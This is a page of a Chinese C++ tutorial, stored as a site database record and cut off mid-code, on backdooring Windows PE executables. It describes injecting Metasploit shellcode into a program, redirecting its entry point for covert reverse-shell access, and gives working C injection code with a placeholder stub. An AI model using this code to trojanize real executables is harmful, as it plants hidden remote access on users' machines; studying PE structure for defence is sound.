{"rsdb":{"rid":"397512","subhead":"","postdate":"0","aid":"273603","fid":"49","uid":"1","topic":"1","content":"
\n

\u672c\u7ae0\u7b14\u8005\u5c06\u4ecb\u7ecd\u4e00\u79cd\u901a\u8fc7Metasploit\u751f\u6210ShellCode\u5e76\u5c06\u5176\u6ce8\u5165\u5230\u7279\u5b9aPE\u6587\u4ef6\u5185\u7684Shell\u6ce8\u5165\u6280\u672f\u3002\u8be5\u6280\u672f\u80fd\u591f\u52ab\u6301\u539f\u59cbPE\u6587\u4ef6\u7684\u5165\u53e3\u5730\u5740\uff0c\u5728PE\u7a0b\u5e8f\u8fd0\u884c\u4e4b\u524d\u6267\u884cShellCode\u53cd\u5f39\uff0c\u6267\u884c\u540e\u6302\u5165\u540e\u53f0\u5e76\u7ee7\u7eed\u8fd0\u884c\u539f\u59cb\u7a0b\u5e8f\uff0c\u5b9e\u73b0\u4e86\u4e00\u79cd\u9690\u853d\u7684Shell\u8bbf\u95ee\u3002\u800c\u6211\u628a\u8fd9\u79cd\u6280\u672f\u53eb\u505a\u5b57\u8282\u6ce8\u5165\u53cd\u5f39\u3002<\/p> \n

\u5b57\u8282\u6ce8\u5165\u529f\u80fd\u8c03\u7528WritePEShellCode<\/code>\u51fd\u6570\uff0c\u8be5\u51fd\u6570\u7684\u4e3b\u8981\u4f5c\u7528\u662f\u63a5\u53d7\u7528\u6237\u4f20\u5165\u7684\u4e00\u4e2a\u6587\u4ef6\u4f4d\u7f6e\uff0c\u5e76\u53ef\u4ee5\u5c06\u4e00\u6bb5\u901a\u8fc7Metasploit<\/code>\u5de5\u5177\u751f\u6210\u7684\u6709\u6548\u8f7d\u8377\u6ce8\u5165\u5230\u7279\u5b9a\u6587\u4ef6\u504f\u79fb\u4f4d\u7f6e\u5904\u3002<\/p> \n

\u8bfb\u8005\u5728\u4f7f\u7528\u8be5\u51fd\u6570\u4e4b\u524d\u9700\u8981\u901a\u8fc7WinHex<\/code>\u627e\u5230\u6ce8\u5165\u4f4d\u7f6e\uff0c\u6211\u4eec\u4ee5\u5982\u4e0b\u622a\u56fe\u4e2d\u768430352<\/code>\u4e3a\u4f8b\uff1b<\/p> \n

\"\"<\/p> \n

\u63a5\u7740\u8bfb\u8005\u9700\u8981\u81ea\u884c\u51c6\u5907\u4e00\u6bb5ShellCode<\/code>\u4ee3\u7801\uff0c\u53ea\u4fdd\u7559\u4ee3\u7801\u90e8\u5206\u53bb\u6389\u5934\u90e8\u53d8\u91cf\u53c2\u6570\uff0c\u5982\u4e0b\u6240\u793a\uff1b<\/p> \n

\"\"<\/p> \n

\u63a5\u7740\u6211\u4eec\u4f7f\u7528\u5982\u4e0b\u8fd9\u6bb5\u4ee3\u7801\u4e2d\u7684WritePEShellCode<\/code>\u51fd\u6570\uff0c\u901a\u8fc7\u4f20\u5165\u6307\u5b9aPE\u6587\u4ef6\u8def\u5f84\uff0c\u6307\u5b9a\u6587\u4ef6\u4fbf\u5b9c\uff0c\u4ee5\u53ca\u6307\u5b9a\u7684ShellCode<\/code>\u6587\u4ef6\u8def\u5f84\uff0c\u5373\u53ef\u81ea\u52a8\u5c06\u5176\u538b\u7f29\u4e3a\u4e00\u884c\u5e76\u5728\u538b\u7f29\u540e\u5c06\u4ee3\u7801\u5199\u51fa\u5230\u6307\u5b9a\u7684\u53ef\u6267\u884c\u6587\u4ef6\u5185\u3002<\/p> \n 

\/\/ \u5c06ShellCode\u5199\u51fa\u5230PE\u7a0b\u5e8f\u7684\u7279\u5b9a\u4f4d\u7f6e\n\/\/ \u53c2\u65701: \u6307\u5b9aPE\u8def\u5f84 \u53c2\u65702: \u6307\u5b9a\u6587\u4ef6\u4e2d\u7684\u504f\u79fb(\u5341\u8fdb\u5236) \u53c2\u65703: \u6307\u5b9aShellCode\u6587\u4ef6\nvoid WritePEShellCode(const char* FilePath, long FileOffset, const char* ShellCode)\n{\n  HANDLE hFile = NULL;\n  FILE* fpointer = NULL;\n  DWORD dwNum = 0;\n\n  int count = 0;\n  char shellcode[8192] = { 0 };\n  unsigned char save[8192] = { 0 };\n\n  \/\/ \u6253\u5f00\u4e00\u6bb5ShellCode\u4ee3\u7801\u5e76\u5904\u7406\u4e3a\u4e00\u884c\n  if ((fpointer = fopen(ShellCode, "r")) != NULL)\n  {\n    char ch = 0;\n    for (int x = 0; (ch = fgetc(fpointer)) != EOF;)\n    {\n      if (ch != L'\\n' && ch != L'\\"' && ch != L'\\\\' && ch != L'x' && ch != L';')\n      {\n        shellcode[x++] = ch;\n        count++;\n      }\n    }\n  }\n  _fcloseall();\n\n  \/\/ \u5c06\u5355\u5b57\u8282\u5408\u5e76\u4e3a\u53cc\u5b57\u8282\n  for (int x = 0; x < count \/ 2; x++)\n  {\n    unsigned int char_in_hex;\n    if (shellcode[x] != 0)\n    {\n      sscanf(shellcode + 2 * x, "%02X", &char_in_hex);\n\n      \/\/ \u6bcf\u5341\u516d\u5b57\u8282\u6362\u4e00\u884c\u8f93\u51fa\n      if ((x+1) % 16 == 0)\n      {\n        printf("0x%02X \\n", char_in_hex);\n      }\n      else\n      {\n        printf("0x%02X ", char_in_hex);\n      }\n      save[x] = char_in_hex;\n    }\n  }\n\n  \/\/ \u6253\u5f00PE\u6587\u4ef6\u5e76\u5199\u51faShellCode\u5230\u6307\u5b9a\u4f4d\u7f6e\n  hFile = CreateFile(FilePath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n  if (INVALID_HANDLE_VALUE != hFile)\n  {\n    SetFilePointer(hFile, FileOffset, NULL, FILE_BEGIN);\n    bool ref = WriteFile(hFile, save, count\/2 , &dwNum, NULL);\n    if (true == ref)\n    {\n      printf("\\n\\n[*] \u5df2\u6ce8\u5165 ShellCode \u5230PE\u6587\u4ef6 \\n[+] \u6ce8\u5165\u8d77\u59cbFOA => 0x%08X \\n",FileOffset);\n    }\n    CloseHandle(hFile);\n  }\n}\n<\/code><\/pre> \n 
\u6211\u4eec\u901a\u8fc7\u4f20\u5165WritePEShellCode("d:\/\/lyshark.exe", 30352, "d:\/\/shellcode.txt");<\/code>\u53c2\u6570\uff0c\u8fd0\u884c\u540e\u5219\u53ef\u5c06\u7279\u5b9a\u6587\u672c\u4e2d\u7684\u673a\u5668\u7801\u6ce8\u5165\u523030352<\/code>\u7684\u4f4d\u7f6e\u5904\uff0c\u8bfb\u8005\u4e5f\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528WinHex<\/code>\u8df3\u8f6c\u5230\u5bf9\u5e94\u4f4d\u7f6e\u89c2\u5bdf\uff0c\u5982\u4e0b\u6240\u793a\uff1b<\/p> \n 
\"\"<\/p> \n 
\u5f53\u7136\u4e86\u4e0a\u8ff0\u65b9\u6cd5\u6ce8\u5165\u5230PE<\/code>\u6587\u4ef6\u4e2d\u6211\u4eec\u9700\u8981\u624b\u52a8\u5206\u6790\u5bfb\u627e\u7a7a\u4f59\u5757\uff0c\u5e76\u5728\u6ce8\u5165\u6210\u529f\u540e\u8fd8\u9700\u8981\u81ea\u884c\u4fee\u6b63PE<\/code>\u6587\u4ef6\u5185\u7684\u5165\u53e3\u5730\u5740\u7b49\uff0c\u8fd9\u79cd\u65b9\u5f0f\u9002\u5408\u4e8e\u5bf9PE<\/code>\u7ed3\u6784\u975e\u5e38\u719f\u6089\u7684\u4eba\u53ef\u4ee5\uff0c\u4f46\u4e5f\u8981\u82b1\u8d39\u4e00\u4e9b\u7cbe\u529b\u53bb\u5bfb\u627e\u5206\u6790\uff0c\u5982\u4e0b\u4ee3\u7801\u5219\u662f\u5b9e\u73b0\u4e86\u81ea\u52a8\u5316\u6ce8\u5165\u529f\u80fd\uff0c\u8be5\u4ee3\u7801\u4e2dFindSpace()<\/code>\u51fd\u6570\u7528\u4e8e\u4ece\u4ee3\u7801\u8282\u7684\u672b\u5c3e\u5f00\u59cb\u641c\u7d22\uff0c\u5bfb\u627e\u7279\u5b9a\u957f\u5ea6\u7684\u7a7a\u4f59\u4f4d\u7f6e\uff0c\u5f53\u627e\u5230\u5408\u9002\u7684\u7f1d\u9699\u540e\u4fbf\u8fd4\u56de\u7f1d\u9699\u9996\u5730\u5740\u3002<\/p> \n 
\u6b64\u65f6dwOep<\/code>\u53d8\u91cf\u5185\u5b58\u50a8\u7684\u662f\u8be5\u7a0b\u5e8f\u539f\u59cb\u7684OEP<\/code>\u5165\u53e3\u4f4d\u7f6e\uff0c\u63a5\u7740\u5c06\u5165\u53e3\u5730\u5740\u8d4b\u503c\u5230*(DWORD *)&shellcode[5]<\/code>\u4e5f\u5c31\u662f\u653e\u5165\u5230shellcode<\/code>\u673a\u5668\u7801\u7684\u7b2c\u516d\u4e2a\u4f4d\u7f6e\u5904\uff0c\u6b64\u5904\u5c06\u53d8\u66f4\u4e3a\u8df3\u8f6c\u5230\u539f\u59cb\u5165\u53e3\u7684\u6307\u4ee4\u96c6\uff0c\u63a5\u7740\u8c03\u7528memcpy<\/code>\u51fd\u6570\u5c06shellcode<\/code>\u4ee3\u7801\u62f7\u8d1d\u5230\u65b0\u5206\u914d\u7684dwAddr<\/code>\u5185\u5b58\u4e2d\uff0c\u6b64\u5904\u7684strlen(shellcode) + 3<\/code>\u4ee3\u8868\u7684\u662fShellCode<\/code>\u4e2d\u5269\u4f59\u7684\\xff\\xe0\\x00<\/code>\u90e8\u5206\uff0c\u6700\u540e\u5c06\u5f53\u524dEIP<\/code>\u6307\u9488\u8bbe\u7f6e\u4e3a\u6211\u4eec\u81ea\u5df1\u7684ShellCode<\/code>\u6240\u5728\u4f4d\u7f6e\uff0c\u901a\u8fc7pNtHeader->OptionalHeader.AddressOfEntryPoint<\/code>\u8d4b\u503c\u8bbe\u7f6e\u6b64\u53d8\u91cf\uff0c\u81f3\u6b64\u8fd9\u4e2a\u6ce8\u5165\u5668\u5c31\u7b97\u5b9e\u73b0\u5566\u3002<\/p> \n 
#include <stdio.h>\n#include <stddef.h>\n#include <windows.h>\n\n\/\/ \\xb8\\x90\\x90\\x90\\x90 => mov eax,90909090\n\/\/ \\xff\\xe0\\x00 => jmp eax\nchar shellcode[] = "\\x90\\x90\\x90\\x90\\xb8\\x90\\x90\\x90\\x90\\xff\\xe0\\x00";\n\n\/\/ \u7f1d\u9699\u7684\u641c\u7d22\u4ece\u4ee3\u7801\u8282\u7684\u672b\u5c3e\u5f00\u59cb\u641c\u7d22,\u6709\u5229\u4e8e\u5feb\u901f\u641c\u7d22\u5230\u7f1d\u9699\nDWORD FindSpace(LPVOID lpBase, PIMAGE_NT_HEADERS pNtHeader)\n{\n  \/\/ \u8df3\u8fc7\u53ef\u9009\u5934\u957f\u5ea6\u7684\u6570\u636e\n  PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)\n    (((BYTE *)&(pNtHeader->OptionalHeader) + pNtHeader->FileHeader.SizeOfOptionalHeader));\n\n  \/\/ \u83b7\u53d6\u5230\u6587\u4ef6\u672b\u5c3e\u7684\u4f4d\u7f6e\n  DWORD dwAddr = pSec->PointerToRawData + pSec->SizeOfRawData - sizeof(shellcode);\n  dwAddr = (DWORD)(BYTE *)lpBase + dwAddr;\n\n  LPVOID lp = malloc(sizeof(shellcode));\n  memset(lp, 0, sizeof(shellcode));\n\n  while (dwAddr > pS","orderid":"0","title":"2.12 PE\u7ed3\u6784\uff1a\u5b9e\u73b0PE\u5b57\u8282\u6ce8\u5165(\u4e00)","smalltitle":"","mid":"0","fname":"c++\u7f16\u7a0b\u57fa\u7840","special_id":"0","bak_id":"0","info":"0","hits":"604","pages":"3","comments":"0","posttime":"2023-09-23 15:44:26","list":"1695455066","username":"admin","author":"","copyfrom":"","copyfromurl":"","titlecolor":"","fonttype":"0","titleicon":"0","picurl":"https:\/\/www.cppentry.com\/upload_files\/","ispic":"0","yz":"1","yzer":"","yztime":"0","levels":"0","levelstime":"0","keywords":"2.12<\/A> \u7ed3\u6784<\/A> \u5b9e\u73b0<\/A>","jumpurl":"","iframeurl":"","style":"","template":"a:3:{s:4:\"head\";s:0:\"\";s:4:\"foot\";s:0:\"\";s:8:\"bencandy\";s:0:\"\";}","target":"0","ip":"112.94.1.100","lastfid":"0","money":"0","buyuser":"","passwd":"","allowdown":"","allowview":"","editer":"","edittime":"0","begintime":"0","endtime":"0","description":"2.12 PE\u7ed3\u6784\uff1a\u5b9e\u73b0PE\u5b57\u8282\u6ce8\u5165","lastview":"1714284443","digg_num":"700","digg_time":"1714196840","forbidcomment":"0","ifvote":"0","heart":"","htmlname":"","city_id":"0"},"page":"1"}